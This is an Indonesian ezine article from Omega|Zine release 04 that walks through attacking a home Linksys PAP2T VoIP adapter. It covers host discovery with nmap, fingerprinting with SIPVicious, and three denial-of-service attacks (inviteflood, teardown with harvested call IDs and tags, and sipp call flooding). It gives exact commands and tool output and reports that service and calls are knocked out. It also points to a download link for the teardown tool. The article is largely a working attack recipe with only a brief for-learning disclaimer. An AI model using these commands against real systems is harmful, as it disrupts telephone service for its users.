                                                                       __     
                                                                __    /\ \    
  ___     ___ ___      __     __      __          ___   _ __   /\_\   \_\ \   
 / __`\ /' __` __`\  /'__`\ /'_ `\  /'__`\       / __`\/\`'__\ \/\ \  /'_` \  
/\ \L\ \/\ \/\ \/\ \/\  __//\ \L\ \/\ \L\.\_  __/\ \L\ \ \ \/ __\ \ \/\ \L\ \ 
\ \____/\ \_\ \_\ \_\ \____\ \____ \ \__/.\_\/\_\ \____/\ \_\/\_\\ \_\ \___,_\
 \/___/  \/_/\/_/\/_/\/____/\/___L\ \/__/\/_/\/_/\/___/  \/_/\/_/ \/_/\/__,_ /
                              /\____/                                         
                              \_/__/                                            

OMEGA|ZINE RELEASE
       04

Author  : lirva32 || lirva32[at]yahoo[dot]com
Online @ www.omega.or.id :: http://ezine.omega.or.id


== VoIP Bomber ==

	Ya, saya akan melakukan penyerangan terhadap perangkat VoIP yang ada di rumah saya,
	perangkat tersebut hanya : VoIP ATA. 
	VoIP...??? ATA...?? ya, VoIP = Voice Over IP, sedangkan ATA = Analog Telephone Adapter. 
	Intinya adalah sebuah perangkat yang membuat telephone rumahan (analog phone) bisa dijadikan 
	sebagai perangkat VoIP. 

	Nah, yang menjadi target saya adalah VoIP ATA. Perangkat ini akan saya lakukan tindakan
	destruktif sehingga VoIP ATA tidak bisa digunakan untuk sementara dan terputus dari jalur 
	VoIP services. Teknik penyerangan ini berlaku pada semua pemodelan VoIP alias tidak terbatas
	pada topologi yang disimulasikan.

	Persiapan :
	1. Laptop
	2. OS Backtrack, saya menggunakan Backtrack 5 code name : Revolution
	3. Wlan0, saya mempergunakan jaringan wireless dalam penyerangan
	
	Kegiatan Penyerangan :
	1. Memastikan IP pada interface wlan0
	   Ya, saya harus memastikannya karena saya terkoneksi pada sebuah Wireless AP Router sehingga
	   DHCP server memberikan IP untuk devices yang saya pergunakan :
	  
		root@bt:~#ifconfig
		
		------------------------------------------------------------------------
		wlan0 	Link encap:Ethernet  HWaddr 00:1c:bf:00:Se:fb  
				inet addr:192.168.1.68  Bcast:192.168.1.255  Mask:255.255.255.0
				inet6 addr: fe80::21c:bfff:fe00:Sefb/64 Scope:Link
				UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
				RX packets:6277 errors:0 dropped:0 overruns:0 frame:0
				TX packets:20451 errors:0 dropped:0 overruns:0 carrier:0	
				collisions:0 txqueuelen:1000 
				RX bytes:6358679 (6.3 MB)  TX bytes:1733016 (1.7 MB)
		------------------------------------------------------------------------
				
	   Analisa :
	   Nah, laptop saya sudah mendapatkan IP dari DHCP Server, yaitu : 192.168.1.68, mari lanjutkan
	   pada langkah berikutnya.


	2. Melakukan scanning untuk mengidetifikasikan host live 
	   Pada langkah pertama sudah didapatkan IP : 192.168.1.68, maka langkah berikutnya saya akan
	   melakukan pencarian informasi yang lebih mendalam dengan melakukan scanning massal. 
	   Disini hanya diperlukan sedikit analisa saja, yaitu menentukan 1 segment range IP yang akan
	   discanning massal, maka 1 range IP tersebut adalah IP : 192.168.1.1 sampai dengan IP : 192.168.1.254. 
	   
	   Saya mempergunakan NMAP dengan metoda "intense scan & no ping", dengan perintah sbb : 
		
		root@bt:~# nmap -T4 -A -v -Pn 192.168.1.1-254
		
		------------------------------------------------------------------------------

		1     Starting Nmap 5.51 ( http://nmap.org ) at 2011-10-31 23:55 WIT	        
		2     NSE: Loaded 57 scripts for scanning.				        
		3     Initiating ARP Ping Scan at 23:55				        
		4     Scanning 67 hosts [1 port/host]				         
		5     Completed ARP Ping Scan at 23:55, 1.87s elapsed (67 total hosts)       
		6     Initiating Parallel DNS resolution of 67 hosts. at 23:55	              
		7     Completed Parallel DNS resolution of 67 hosts. at 23:55, 0.05s elapsed 
		8     Nmap scan report for 192.168.1.2 [host down]			        
		9     
		10    
		11    
		12    Initiating SYN Stealth Scan at 23:56
		13    Scanning 192.168.1.80 [1000 ports]
		14    Discovered open port 80/tcp on 192.168.1.80
		15    Completed SYN Stealth Scan at 23:56, 1.48s elapsed (1000 total ports)
		16    Initiating Service scan at 23:56
		17    Scanning 1 service on 192.168.1.80
		18    Completed Service scan at 23:56, 5.01s elapsed (1 service on 1 host)
		19    Initiating OS detection (try #1) against 192.168.1.80
		20    NSE: Script scanning 192.168.1.80
		21    Initiating NSE at 23:56
		22    Completed NSE at 23:56, 9.03s elapsed
		23    Nmap scan report for 192.168.1.80
		24    Host is up (0.0026s latency).
		25    Not shown: 999 closed ports 
		26    PORT   STATE SERVICE    VERSION
		27    80/tcp open  tcpwrapped
		28    MAC Address: 00:23:69:7C:2B:E4 (Cisco-Linksys)
		29    Device type: VoIP adapter
		30    Running: Sipura embedded
		31    OS details: Sipura SPA-1001 or SPA-3000 VoIP adapter
		32    Network Distance: 1 hop
		33    TCP Sequence Prediction: Difficulty=262 (Good luck!)
		34    IP ID Sequence Generation: Incremental
		35    Read data files from: /usr/local/share/nmap
		36    OS and Service detection performed. Please report any incorrect results
		37    at http://nmap.org/submit/ .
		38    Nmap done: 254 IP addresses (3 hosts up) scanned in 81.30 seconds
		39    Raw packets sent: 4673 (203.516KB) | Rcvd: 3087 (129.594KB)
		------------------------------------------------------------------------------
		
		Analisa:
		Wah...hasil laporan NMAP begitu panjang dan menggoda...pasti disukai para wanita...lol,
		sehingga didapatkan informasi bahwa pada IP : 192.168.1.80 terindikasi sebagai perangkat VoIP.
		Kok tau itu perangkat VoIP...? gini masbro... perhatikan pada baris 29,30,31. Baris-baris
		tersebut menunjukan kalau itu adalah perangkat VoIP. 

		Perhatikan juga pada baris 27 "80/tcp open tcpwrapped" yang mengindikasikan bahwa perangkat VoIP
		tersebut mengaktifkan metoda penyetingan berbasis web base (http) yang bisa menjadi target
		penyerangan berikutnya..lol 

		Untuk lebih detailnya maka akan dilakukan proses "fingerprint" pada langkah berikutnya.

		
	3. FingerPrint 
	   Okay...kegiatan ini hanyalah kegiatan untuk memastikan bahwa target yang menjadi incaran
	   adalah benar-benar target alias kagak salah sasaran.
	   
		root@bt:/pentest/voip/sipvicious# ./svmap.py 192.168.1.1-254
		
		+-------------------------------------------------------------------------+
		| SIP Device        | User Agent               | Fingerprint              |
		+-------------------------------------------------------------------------+
		| 192.168.1.80:5060 | Linksys/PAP2T-3.1.15(LS) | Linksys/PAP2T-3.1.15(LS) |
		+-------------------------------------------------------------------------+

		Analisa :
		Uhhhuuuyyyy... ternyata benar bahwa IP 192.168.1.80 adalah perangkat VoIP dengan SIP Port 5060.
		Tidak hanya itu, merk dan series perangkat VoIP pun bisa didapatkan yaitu : Linksys/PAP2T-3.1.15(LS). 
		Mari mang....kita lanjutkan pada proses fingerprint yang lebih bermutu : 
	
		   root@bt:/pentest/voip/sipvicious# ./svmap.py 192.168.1.80 -d

		-----------------------------------------------------------------------------------------  
		1 ('192.168.1.80', 5060)
		2 SIP/2.0 404 Not Found                      
		3 To: "sipvicious"<sip:100@1.1.1.1>;tag=388074baa08bb653i
		4 From: "sipvicious"<sip:100@1.1.1.1>;tag=63306138303135303133633401373935303131393234
		5 Call-ID: 785522139741125439084511
		6 CSeq: 1 OPTIONS
		7 Via: SIP/2.0/UDP 127.0.1.1:5060;branch=z9hG4bK-3073480069
		8 Server: Linksys/PAP2T-3.1.15(LS)  
		9 Content-Length:0                         
		+-------------------------------------------------------------------------+
		10 | SIP Device        | User Agent               | Fingerprint	     |
		11
		+--------------------------------------------------------------------------+
		12 | 192.168.1.80:5060 | Linksys/PAP2T-3.1.15(LS) | Linksys/PAP2T-3.1.15(LS)|  
		+-------------------------------------------------------------------------+
   
		-----------------------------------------------------------------------------------------
		
		Analisa:
		Pusing.....?? santai gan... dari hasil fingerprint tersebut, kita mendapatkan :
		1. IP perangkat VoIP : 192.168.1.80, dengan SIP port 5060 
		2. Pada baris 3, didapatkanlah VoIP number extention yaitu : 100 yang didapat dari sip:100@1.1.1.1
		3. Pada baris 3, didapatkan juga toTag number, yaitu : 388074baa08bb653i0
		4. Pada baris 4, didptkan jg fromTag number, yaitu : 63306138303135303133633401373935303131393234 
		5. Pada baris 5, didapatkan Call-ID, yaitu : 785522139741125439084511
		6. Pada baris 7, didapatkan protocol yang digunakan untuk jalur VoIP, jg didapatkan branch, yaitu : z9hG4bK-3073480069
		7. Pada baris 8 menerangkan bahwa Server berbasis: Linksys/PAP2T 3.1.15(LS) 
		
		Sungguh...mangtabs sekali informasi2 tersebut dan sangat berguna dalam melakukan penyerangan VoIP.

		
	4. Penyerangan 
	   Mari kita lakkukan penyerangan... ingat penyerangan iini hanya untuk pembelajaran saja, segala tindakan
	   destruktif saya tidak bertanggung jawab.

		* InviteFlood :
		---------------
		Teknik penyerangan yang seolah2 VoIP devices diajak untuk melakukan komunikasi dengan banyak user.
		root@bt:/pentest/voip/inviteflood# ./inviteflood <interface> <ekstensi> <IP_Domain> <IPHost_Target> <JlhPaket_Data>

		root@bt:/pentest/voip/inviteflood# ./inviteflood wlan0 100 192.168.1.80 192.168.1.80 10000000

		+-----------------------------------------------+
		|  inviteflood - Version 2.0                    |
		|            June 09, 2006                      |
		|                                               |
		|  source IPv4 addr:port   = 192.168.1.68:9     |
		|  dest   IPv4 addr:port   = 192.168.1.80:5060  |
		|  targeted UA             = 100@192.168.1.80   |
		|                                               |
		|  Flooding destination with 10000000 packets   |
		|  sent: 13165085                               | 
		|  exiting...                                   |
		+-----------------------------------------------+
		
		Hasil selama pengiriman paket data berlangsung :
		* root@bt:/pentest/voip/sipp# ping 192.168.1.80 
		  PING 192.168.1.80 (192.168.1.80) 56(84) bytes of data
		  (berhenti tanpa respon apapun) 

		* Port 80 HTTP pun tewas
		* Jalur VoIP tidak bisa dihubungi
		* VoIP Enduser mengalami terputusnya koneksi
		* Semakin banyak jumlah paket dalam yang dikirim berarti semakin lama tewasnya VoIP devices target !!

		
		
		
		* tearDown attacking :
		---------------------- 
		Penyerangan dengan melumpuhkan semua client (user) yang terkoneksi pada VoIP devices.
		O iya, pada Backtrack 5 aplikasi teardown tidak tersedia oleh karena itu Anda harus mengambilnya a.k.a download di :
		http://www.hackingvoip.com/tools/teardown.tar.gz, jangan lupa aplikasi ini membutuhkan Ruby 1.8 keatas. 
		
		Untuk menggunakan "tearDown" diperlukan hasil analisa dari fingerprint (proses 3), yaitu :
		1. IP perangkat VoIP : 192.168.1.80, dengan SIP port 5060 
		2. Pada baris 3, didapatkanlah VoIP number extention yaitu : 100 yang didapat dari sip:100@1.1.1.1
		3. Pada baris 3, didapatkan juga toTag number, yaitu : 388074baa08bb653i0
		4. Pada baris 4, didptkan jg fromTag number, yaitu : 63306138303135303133633401373935303131393234
		5. Pada baris 5, didapatkan Call-ID, yaitu : 785522139741125439084511
		6. Pada baris 7, didapatkan protocol yang digunakan untuk jalur VoIP, jg didapatkan branch, yaitu : z9hG4bK-3073480069
		7. Pada baris 8 menerangkan bahwa Server berbasis: Linksys/PAP2T 3.1.15(LS)


		Mari gunakan informasi tersebut sebagai parameter penyerangan dengan tearDown, sbb : 
		root@bt:/pentest/voip/teardown# ./teardown <interface> <extention> <sip_proxy> <IP_target> <callID> <fromTag> <toTag>

		./teardown wlan0 100 192.168.1.80 192.168.1.80 785522139741125439084511 63306138303135303133633401373935303131393234 388074baa08bb653i0

		+--------------------------------------------------------------------------+
		| teardown - Version 1.0                                                   |
		|            Feb. 17, 2006                                                 |
		|                                                                          |
		| source IPv4 addr:port = 192.168.1.68                                     |
		| dest   IPv4 addr:port = 192.168.1.80                                     |
		| target UA             = 100@192.168.1.80                                 |
		| From Tag		    = 63306138303135303133633401373935303131393234 |
		| To Tag		    = 388074baa08bb653i0                           |
		| Call ID		    = 785522139741125439084511                     |
		+--------------------------------------------------------------------------+
		
		Hasil penyerangan :
		* Jalur komunikasi VoIP yang dipergunakan oleh user terputus !!

		
		* SIP protocol attacking :
		-------------------------- 
		Penyerangan dengan cara memberikan koneksi "total-call" user yang berlebihan sehingga SIP tidak lagi
		mampu memberikan layanan.

		root@bt:/pentest/voip/sipp# ./sipp -sn uac <ip_target>
	
		root@bt:/pentest/voip/sipp# ./sipp -sn uac 192.168.1.80

		+-------------------------------------------------------------------------------+
		| Resolving remote host '192.168.1.80'... Done.					|
		+------------------------------ Scenario Screen -------- [1-9]: Change Screen --+
		| Call-rate(length)   Port   Total-time  Total-calls  Remote-host		|
		| 16.0(0 ms)/1.000s   5060      58.96 s          365  192.168.1.80:5060(UDP)	|
		|										|
		| 1 new calls during 0.854 s period      0 ms scheduler resolution		|
		| 48 calls (limit 48)                    Peak was 48 calls, after 58 s	  	|
		| 1 Running, 238 Paused, 26 Woken up						|
		| 0 dead call msg (discarded)            0 out-of-call msg (discarded)		|
		| 3 open sockets								|
		|										|
		|                              Messages  Retrans   Timeout   Unexpected-Msg	|
		|    INVITE ---------->         365       436       29			  	|
		|       100 <----------         0         0         0         288		| 
		|       180 <----------         0         0         0         0		   	|
		|       183 <----------         0         0         0         0		   	|
		|       200 <----------  E-RTD1 0         0         0         0		   	|
		|       ACK ---------->         0         0					|
		|     Pause [      0ms]         0                             0		   	|
		|       BYE ---------->         0         0         0			   	| 
		|       200 <----------         0         0         0         0		   	| 
		|										|
		+------------------------------ Test Terminated --------------------------------+
		
		
		Hasil penyerangan : 
		* Layanan SIP terganggu bahkan terhenti karena adanya total-call yang berlebihan karena
		  limit-calls = 48 sedangkan total-calls sudah mencapai = 365. 
		* Penyerangan bisa dilipatgandakan dengan menekah tombol "+" (tanda tanda kutip)


	Akhirnya selesai sudah tulisan ini saya buat, tiada maksud untuk menambah kejahatan otak...
	tapi ini adalah sejati2nya ilmu yang memang siapapun harus mengetahuinya, semoga saja tetap tidak 
	memberikan kotor pada otak Anda semuanya. Selamat belajar Indonesia...!!!!


Greetz :
	- Echo|Staff, 
	- Ibunda tercinta... tanpa perjuangan bunda aku tidak akan bisa seperti sekarang ini...thx bunda...;)
	- MyDaughter : Faiza Debian dan Fivana Gutsy "Anakku...ini dunia ayahmu..:)"
	- kang Arif s4kitj1wa, Flexus, SheraYusuf, etc
	- AllMyStudent@STMIK Bina Insani
	- RNDC, DevilzCode, MyAlmamater : FTI_Univ_Budi_Luhur, IndonesianLockPicking.

		kritik & saran kirimkan ke lirva32@yahoo.com
		